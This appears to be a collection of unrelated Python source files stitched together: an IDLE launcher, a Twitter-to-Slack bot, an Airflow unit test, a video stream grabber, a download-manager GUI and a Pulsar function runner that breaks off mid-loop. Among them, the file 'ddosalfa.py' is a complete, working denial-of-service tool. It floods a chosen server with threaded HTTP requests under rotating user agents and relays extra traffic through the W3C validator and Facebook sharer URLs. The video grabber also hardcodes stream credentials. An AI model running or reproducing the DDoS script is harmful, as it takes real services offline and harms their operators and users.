-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
flist.open_shell()
elif enable_shell:
flist.pyshell = PyShell(flist)
flist.pyshell.begin()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %s
del _sys
\n""" % `sys.argv`)
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
def display_port_binding_error():
print """\
\nIDLE cannot run.
IDLE needs to use a specific TCP/IP port (8833) in order to communicate with
its Python execution server. IDLE is unable to bind to this port, and so
cannot start. Here are some possible causes of this problem:
1. TCP/IP networking is not installed or not working on this computer
2. Another program (another IDLE?) is running that uses this port
3. Personal firewall software is preventing IDLE from using this port
Run IDLE with the -n command line switch to start without a subprocess
and refer to Help/IDLE Help "Running without a subprocess" for further
details.
"""
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
twitter.py | import sys
import os
import time
from queue import Queue
from threading import Thread
from tweepy import Stream
import tweepy
import db as db
import slack as slack
import yaml
from watchgod import run_process, watch
from watchgod.watcher import DefaultDirWatcher
from http.client import IncompleteRead as http_incompleteRead
from urllib3.exceptions import IncompleteRead as urllib3_incompleteRead
import logging
logging.basicConfig(filename='twitter.log',
format='%(asctime)s TWITTER %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
level=logging.DEBUG)
try:
config = yaml.safe_load(open('config.yaml'))
except yaml.YAMLError as exc:
print(exc)
TWITTER_CONSUMER_KEY = os.environ['TWITTER_CONSUMER_KEY']
TWITTER_CONSUMER_SECRET = os.environ['TWITTER_CONSUMER_SECRET']
TWITTER_ACCESS_TOKEN = os.environ['TWITTER_ACCESS_TOKEN']
TWITTER_ACCESS_TOKEN_SECRET = os.environ['TWITTER_ACCESS_TOKEN_SECRET']
POST_CHANNEL = config['channel']
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_ACCESS_TOKEN_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
# Create custom Classes #######################################################
class CSVWatcher(DefaultDirWatcher):
def should_watch_file(self, entry):
return entry.name.endswith(('.csv',))
class CustTweepyStream(Stream):
"""Custom Stream usable in contexts"""
def finalize(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
self.finalize()
def __enter__(self):
return self
# Brute force filtering functions #############################################
def filter_tweets_by_word(status):
"""Brute-force search"""
flag = False
# search tweet text
for word in db.get_keywords():
for w in status.text.split():
if word == w:
flag = True
# search quote tweet text
if hasattr(status, "quoted_status"):
for word in db.get_keywords():
for w in status.quoted_status.text.split():
if word == w:
flag = True
# search retweet text
if hasattr(status, "retweeted_status"):
for word in db.get_keywords():
for w in status.retweeted_status.text.split():
if word == w:
flag = True
return flag
def filter_tweets_by_user(twitter_user):
"""Brute-force search"""
flag = False
for user in db.get_users():
if user == '@' + str(twitter_user):
flag = True
return flag
###############################################################################
def preprocess_text(status):
"""
convert extended tweets text and full text tweets
to something our template can handle
"""
if hasattr(status, "full_text"):
status.text = status.full_text
if hasattr(status, "extended_tweet"):
status.text = status.extended_tweet["full_text"]
if hasattr(status, "quoted_status"):
if hasattr(status.quoted_status, "full_text"):
status.quoted_status.text = status.quoted_status.full_text
if hasattr(status, "retweeted_status"):
if hasattr(status.retweeted_status, "full_text"):
status.retweeted_status.text = status.retweeted_status.full_text
return status
#override tweepy.StreamListener to add logic to on_status
class MyStreamListener(tweepy.StreamListener):
def __init__(self, channel='bot-dev', q=Queue()):
super(MyStreamListener,self).__init__()
self.channel = channel
# create a queue for tweet data
num_worker_threads = 4
self.q = q
for i in range(num_worker_threads):
t = Thread(target=self.process_status)
t.daemon = True
t.start()
def on_status(self, status):
#store status in the queue
self.q.put(status)
return True
def process_status(self):
"""Handle tweet data"""
# return false to stop the stream and close the connection
while True:
status = self.q.get()
try:
logging.info("Got a tweet!")
status = preprocess_text(status)
# parse for authors
if filter_tweets_by_user(status.user.screen_name):
logging.info("found an author match")
# parse for keywords
if filter_tweets_by_word(status):
logging.info("found a text match!")
# filter out reply tweets
if status.in_reply_to_status_id == None:
slack.write_block(slack.build_message(status),
user_icon=status.user.profile_image_url,
channel=self.channel)
# Check for an error Tweepy encounters every ~1 day or so.
# This is likely caused by the process_status function falling
# behind the stream and should be fixed with the use of a queue
# but we can still check for these errors for now.
# https://github.com/tweepy/tweepy/issues/908
# https://github.com/tweepy/tweepy/issues/237
except BaseException as e:
logging.error("Error on_data: %s, Pausing..." % str(e))
time.sleep(5)
continue
except http_incompleteRead as e:
logging.error("http.client Incomplete Read error: %s" % str(e))
logging.error("~~~ Restarting stream search in 5 seconds... ~~~")
time.sleep(5)
continue
except urllib3_incompleteRead as e:
logging.error("urllib3 Incomplete Read error: %s" % str(e))
logging.error("~~~ Restarting stream search in 5 seconds... ~~~")
time.sleep(5)
continue
self.q.task_done()
return True
def on_error(self, status_code):
"""Handle HTTP errors from Twitter"""
with self.q.mutex: # thread safe
# clear the queue on error
self.q.clear()
logging.error("Recieved error code: {}".format(status_code))
if status_code == 420:
# request rate limit
logging.warning("API rate limited!! Waiting 60s and will try to restart")
time.sleep(60)
bot_stream = launch_bot()
for changes in watch(os.path.abspath('.'), watcher_cls=CSVWatcher):
print(changes)
bot_stream = restart_bot(bot_stream)
return False
def get_ids():
"""Helper to get Twitter id numbers from user handles"""
users = db.get_users()
ids = []
for user in users:
ids.append(str(api.get_user(screen_name = user).id))
return ids
def launch_bot(channel=POST_CHANNEL):
"""
Start the stream and filter for users in the db list.
All other filtering is done by the Listener.
"""
logging.info("Creating listener...")
myStreamListener = MyStreamListener(channel=channel)
myStream = CustTweepyStream(auth = api.auth,
listener=myStreamListener,
include_entities=True,
tweet_mode = 'extended')
# start filtering
logging.info("Starting bot...")
# async needs to be true so we don't block the file watcher
# stall_warnings for when the tweets come too fast
myStream.filter(follow=get_ids(), is_async=True, stall_warnings=False)
return myStream, myStreamListener
def restart_bot(stream, listener):
# try to kill previous stream
logging.info("Restarting bot stream!")
# https://stackoverflow.com/questions/38560760/python-clear-items-from-priorityqueue
# clear the queue on error
logging.info("Killing threads..")
# with listener.q.mutex: # thread safe never seemed to work
while not listener.q.empty():
print("in loop")
try:
listener.q.get(block=False,timeout=1.0)
except:
continue
listener.q.task_done()
logging.info("Disconnecting from stream")
stream.disconnect()
# return a new stream but wait some time to avoid rate limiting
logging.info("Waiting 60s to reconnect...")
time.sleep(60)
return launch_bot()
if __name__ == '__main__':
dev_mode = False # see file changes
# run the bot watching for file changes using CSVWatcher
bot_stream, bot_listener = launch_bot()
for changes in watch(os.path.abspath('.'), watcher_cls=CSVWatcher):
if dev_mode:
print(changes)
bot_stream, bot_listener = restart_bot(bot_stream, bot_listener)
else:
bot_stream, bot_listener = restart_bot(bot_stream, bot_listener)
|
test_local_task_job.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import time
import unittest
from airflow import AirflowException, models, settings
from airflow.configuration import conf
from airflow.executors import SequentialExecutor
from airflow.jobs import LocalTaskJob
from airflow.models import DAG, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import timezone
from airflow.utils.db import create_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from tests.compat import patch
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@patch('os.getpid')
def test_heartbeat_failed_fast(self, mock_getpid):
"""
Test that task heartbeat will sleep when it fails fast
"""
mock_getpid.return_value = 1
heartbeat_records = []
def heartbeat_recorder():
heartbeat_records.append(timezone.utcnow())
with create_session() as session:
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag_id = 'test_heartbeat_failed_fast'
task_id = 'test_heartbeat_failed_fast_op'
dag = dagbag.get_dag(dag_id)
task = dag.get_task(task_id)
dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
job = LocalTaskJob(task_instance=ti, executor=TestExecutor(do_update=False))
job.heartrate = 2
job.heartbeat = heartbeat_recorder
job._execute()
self.assertGreater(len(heartbeat_records), 1)
for i in range(1, len(heartbeat_records)):
time1 = heartbeat_records[i - 1]
time2 = heartbeat_records[i]
self.assertGreaterEqual((time2 - time1).total_seconds(), job.heartrate)
@unittest.skipIf('mysql' in conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
ti_run.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti_run,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
|
ddosalfa.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# DDos cru Alfa v1.0
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m Bot ddos cru em andamento use : python ddosalfa.py [-s] [-p] [-t]
-h : ajuda
-s : server ip
-p : porta padrao 80
-t : turbo padrao 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
#
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
print('nao me responsabilizo pelo mau uso da ferramenta')
|
vehicle-inspector.py | #! /usr/bin/env python
from smartcameras.subscriber import VehicleInspector
import threading
def main():
print("########################################")
print ""
print("Welcome to the Vehicle Inspector!")
print ""
print("########################################")
vehicleInspector = VehicleInspector()
thread = threading.Thread(target=vehicleInspector.activate)
thread.daemon = True
thread.start()
while not vehicleInspector.isActive:
time.sleep(1)
print ""
print("The Vehicle Inspector has been activated!")
print ""
while True:
try:
raw_input("Press Ctrl+D to exit.")
except EOFError:
print ""
break
vehicleInspector.terminate()
thread.join()
print "Vehicle Inspector terminated."
print "Closing..."
if __name__ == "__main__":
main()
|
video_grabber.py | import cv2
import threading
class VideoGrabber():
sources_urls = {
"tvp:": "http://user:user@192.168.2.112:9981/stream/channel/28c32609c3e9143dff5dc1b0d16838cd?profile=mpeg",
"polsat": "http://user:user@192.168.2.112:9981/stream/channel/a5f47e2442e9d19f43dafb7b51c686a2?profile=mpeg",
"tvn": "http://user:user@192.168.2.112:9981/stream/channel/3679782872d6b7160b013fb8c0a9b393?profile=mpeg"
}
frames = {}
def __init__(self, scaling_factor = 1):
self.scaling_factor = scaling_factor
def run(self):
for name, url in self.sources_urls.items():
thread = threading.Thread(target=self.run_source_thread, args=(name, url), daemon = True)
thread.start()
print(f"Thread: {name} started")
def run_source_thread(self, name, url):
cap = cv2.VideoCapture(url)
while True:
ret, frame = cap.read()
if frame is None:
continue
if self.scaling_factor > 1:
height, width, _ = frame.shape
new_height = height / self.scaling_factor
new_width = width / self.scaling_factor
frame = cv2.resize(frame, (int(new_width), int(new_height)))
self.frames[name] = frame
def is_ready(self):
return len(self.frames) == len(self.sources_urls)
|
NTGmutiTask.py | from os import kill
import total
import RPC_Thread
import tkinter.messagebox
import time
import threading
def pause(TaskID, part, count):
if part['text'] == 'โ':
part['text'] = 'โถ'
part.update()
total.RPC_down[count]['ispause'] = True
RPC_Thread.PauseTask(TaskID)
else:
part['text'] = 'โ'
part.update()
total.RPC_down[count]['ispause'] = False
RPC_Thread.StartTask(TaskID)
return 0
def pauseThread(TaskID, part, count):
Tpause = threading.Thread(target = pause, args= (TaskID, part, count))
Tpause.start()
return 0
def killTask(t1):
Tkill = threading.Thread(target = RPC_Thread.RemoveFile, args= (t1, ))
Tkill.start()
return 0
def change(stuff, page):
pageLimted = (page - 1) * 4 #ๆพ็คบๅบๆฐ
#ๅฆๆไปปๅกๆปๆฐๆฏ่ฆๆพ็คบ็ๅคๆ็ญไบๅฐฑ็ปง็ปญ
if len(total.RPC_down) >= pageLimted and page > 0:
stuff[1][1]['command'] = lambda t1 = '': print()
stuff[2][1]['command'] = lambda t1 = '': print()
stuff[3][1]['command'] = lambda t1 = '': print()
stuff[4][1]['command'] = lambda t1 = '': print()
stuff[1][2]['command'] = lambda t1 = '': print()
stuff[2][2]['command'] = lambda t1 = '': print()
stuff[3][2]['command'] = lambda t1 = '': print()
stuff[4][2]['command'] = lambda t1 = '': print()
if pageLimted + 4 <= len(total.RPC_down):
#็ดๆฅๆฏ4
countLen = 4
else:
#ๅฆๆๆฏไปๅฐ๏ผๆปๆฐๅๅปๆพ็คบๅบๆฐๅไธบ่ฆๅ่พน็ๆฐ็ฎ
countLen = int(len(total.RPC_down) - pageLimted)
count = 1
while count <= countLen:
stuff[count][0]['text'] = 'ๅ็งฐ:' + str(total.RPC_down[pageLimted+count]['name']) + '\n'+ str(total.RPC_down[pageLimted+count]['satuation']) + str(total.RPC_down[pageLimted+count]['total_size'])
if str(total.RPC_down[pageLimted+count]['satuation']) == 'ๅทฒๅ ้ค':
stuff[count][1]['text'] = 'โ'
stuff[count][1]['command'] = lambda :print()
stuff[count][2]['command'] = lambda :print()
else:
#ๅฏนไบ้กต้ขๅๅๆถๆ้ฎๆๆฌไธๅ็่กฅๆ
if total.RPC_down[pageLimted+count]['ispause'] == True:
stuff[count][1]['text'] = 'โถ'
else:
stuff[count][1]['text'] = 'โ'
stuff[count][1]['command'] = lambda t1 = total.RPC_down[pageLimted+count]['token'], t2 = stuff[count][1], t3 = pageLimted+count: pauseThread(t1, t2, t3)
stuff[count][2]['command'] = lambda t1 = total.RPC_down[pageLimted+count]['token']: killTask(t1)
count += 1
#ๆฒกๆไปปๅก็labelๅฐฑ้็ฝฎ
while count <= 4:
stuff[count][0]['text'] = ''
stuff[count][1]['text'] = 'โ'
count += 1
stuff[1][0].update()
stuff[2][0].update()
stuff[3][0].update()
stuff[4][0].update()
else:
tkinter.messagebox('้่ฏฏ', 'ไธๅญๅจ็้กตๆฐ')
return 0
def ThreadTask(stuff):
while True:
time.sleep(0.05)
count = 1
if len(total.RPC_down) != 0:
#count += 1
while count <= len(total.RPC_down):
RPC_Thread.GetDownSta(total.RPC_down[count]['token'], count)
count += 1
change(stuff, total.pageMutiTask)
change(stuff, total.pageMutiTask) |
python_instance.py | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
try:
import Queue as queue
except:
import queue
import threading
import sys
import re
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
from functools import partial
from collections import namedtuple
from threading import Timer
from function_stats import Stats
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
PY3 = sys.version_info[0] >= 3
def base64ify(bytes_or_str):
if PY3 and isinstance(bytes_or_str, str):
input_bytes = bytes_or_str.encode('utf8')
else:
input_bytes = bytes_or_str
output_bytes = base64.urlsafe_b64encode(input_bytes)
if PY3:
return output_bytes.decode('ascii')
else:
return output_bytes
class PythonInstance(object):
def __init__(self, instance_id, function_id, function_version, function_details, max_buffered_tuples,
expected_healthcheck_interval, user_code, pulsar_client, secrets_provider, cluster_name):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
self.queue = queue.Queue(max_buffered_tuples)
self.log_topic_handler = None
if function_details.logTopic is not None and function_details.logTopic != "":
self.log_topic_handler = log.LogTopicHandler(str(function_details.logTopic), pulsar_client)
self.pulsar_client = pulsar_client
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.execution_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
self.expected_healthcheck_interval = expected_healthcheck_interval
self.secrets_provider = secrets_provider
self.metrics_labels = [function_details.tenant,
"%s/%s" % (function_details.tenant, function_details.namespace),
function_details.name,
instance_id, cluster_name,
"%s/%s/%s" % (function_details.tenant, function_details.namespace, function_details.name)]
self.stats = Stats(self.metrics_labels)
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > self.expected_healthcheck_interval * 3:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGKILL)
sys.exit(1)
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
def run(self):
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
for topic, consumer_conf in self.instance_config.function_details.source.inputSpecs.items():
